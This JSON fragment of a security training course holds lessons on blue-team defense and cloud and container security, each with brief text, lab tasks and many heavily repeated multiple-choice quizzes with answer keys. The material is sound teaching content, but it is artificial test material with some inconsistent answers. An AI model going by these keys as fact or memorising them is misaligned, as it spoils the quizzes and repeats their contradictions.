vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"df-df-awareness","cat":"Defense & Blue Team","title":"Security Awareness Training","diff":1,"xp":50,"intro":"Train users to recognize threats.","sections":[{"type":"text","content":"Train users to recognize threats."},{"type":"code","lang":"bash","content":"Phishing recognition, password hygiene, MFA, reporting suspicious activity"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"Most breaches start with...","opts":["Zero-days","Human error (phishing, credential reuse)","Hardware failure","Natural disaster"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"df-df-ir-playbook","cat":"Defense & Blue Team","title":"IR Playbook Writing","diff":2,"xp":150,"intro":"Pre-planned response for common incident types.","sections":[{"type":"text","content":"Pre-planned response for common incident types."},{"type":"code","lang":"bash","content":"Trigger, triage, contain, investigate, remediate, document"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"Playbooks should be written...","opts":["During the incident","Before any incident occurs","After the incident","Never"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"cl-cl-shared-resp","cat":"Cloud & Container","title":"Shared Responsibility Model","diff":1,"xp":50,"intro":"Provider secures infrastructure, you secure what you build.","sections":[{"type":"text","content":"Provider secures infrastructure, you secure what you build."},{"type":"code","lang":"bash","content":"AWS/Azure/GCP secure physical/hypervisor. You secure IAM, data, apps"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"Who patches EC2 operating systems?","opts":["AWS","The customer","Both","Neither"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"Cloud-native WAF examples include...","opts":["iptables","AWS WAF, Cloudflare, Azure Front Door","Snort","fail2ban"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"cl-cl-iam","cat":"Cloud & Container","title":"IAM Fundamentals","diff":1,"xp":75,"intro":"Identity and Access Management basics.","sections":[{"type":"text","content":"Identity and Access Management basics."},{"type":"code","lang":"bash","content":"Users, groups, roles, policies. Principle of least privilege"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"Action:* Resource:* means...","opts":["Read only","Full admin access to everything","Limited access","No access"],"ans":1},{"type":"quiz","q":"Infrastructure drift means...","opts":["Moving to a new region","Actual infrastructure diverged from its defined state","Network latency","Container migration"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"cl-cl-sg","cat":"Cloud & Container","title":"Security Groups","diff":1,"xp":75,"intro":"Virtual firewalls for cloud instances.","sections":[{"type":"text","content":"Virtual firewalls for cloud instances."},{"type":"code","lang":"bash","content":"Define allowed inbound/outbound by port, protocol, source"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"0.0.0.0/0 means...","opts":["Blocked","Open to the entire internet","Internal only","VPN only"],"ans":1},{"type":"quiz","q":"Cloud-native WAF examples include...","opts":["iptables","AWS WAF, Cloudflare, Azure Front Door","Snort","fail2ban"],"ans":1},{"type":"quiz","q":"Infrastructure drift means...","opts":["Moving to a new region","Actual infrastructure diverged from its defined state","Network latency","Container migration"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"cl-cl-s3","cat":"Cloud & Container","title":"S3 Bucket Security","diff":1,"xp":75,"intro":"Prevent public access to S3 storage.","sections":[{"type":"text","content":"Prevent public access to S3 storage."},{"type":"code","lang":"bash","content":"Block Public Access, bucket policies, ACLs, encryption at rest"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"S3 Block Public Access prevents...","opts":["All access","Accidental public exposure","Encryption","Logging"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"Cloud-native WAF examples include...","opts":["iptables","AWS WAF, Cloudflare, Azure Front Door","Snort","fail2ban"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"cl-cl-cloudtrail","cat":"Cloud & Container","title":"CloudTrail Logging","diff":1,"xp":75,"intro":"Log all API calls in AWS.","sections":[{"type":"text","content":"Log all API calls in AWS."},{"type":"code","lang":"bash","content":"Who did what, when, from where \u2014 essential for forensics"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"CloudTrail logs...","opts":["File changes","API calls and management events","Network traffic","Container activity"],"ans":1},{"type":"quiz","q":"Infrastructure drift means...","opts":["Moving to a new region","Actual infrastructure diverged from its defined state","Network latency","Container migration"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"cl-cl-docker-sec","cat":"Cloud & Container","title":"Docker Security Basics","diff":1,"xp":75,"intro":"Don't run as root, limit capabilities, scan images.","sections":[{"type":"text","content":"Don't run as root, limit capabilities, scan images."},{"type":"code","lang":"bash","content":"USER directive, --cap-drop=ALL, read-only filesystem, image scanning"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"--privileged flag is dangerous because...","opts":["Slower","Full host access from inside the container","Better logging","More storage"],"ans":1},{"type":"quiz","q":"Cloud-native WAF examples include...","opts":["iptables","AWS WAF, Cloudflare, Azure Front Door","Snort","fail2ban"],"ans":1},{"type":"quiz","q":"Infrastructure drift means...","opts":["Moving to a new region","Actual infrastructure diverged from its defined state","Network latency","Container migration"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"cl-cl-k8s-intro","cat":"Cloud & Container","title":"Kubernetes Security Intro","diff":2,"xp":150,"intro":"Container orchestration security fundamentals.","sections":[{"type":"text","content":"Container orchestration security 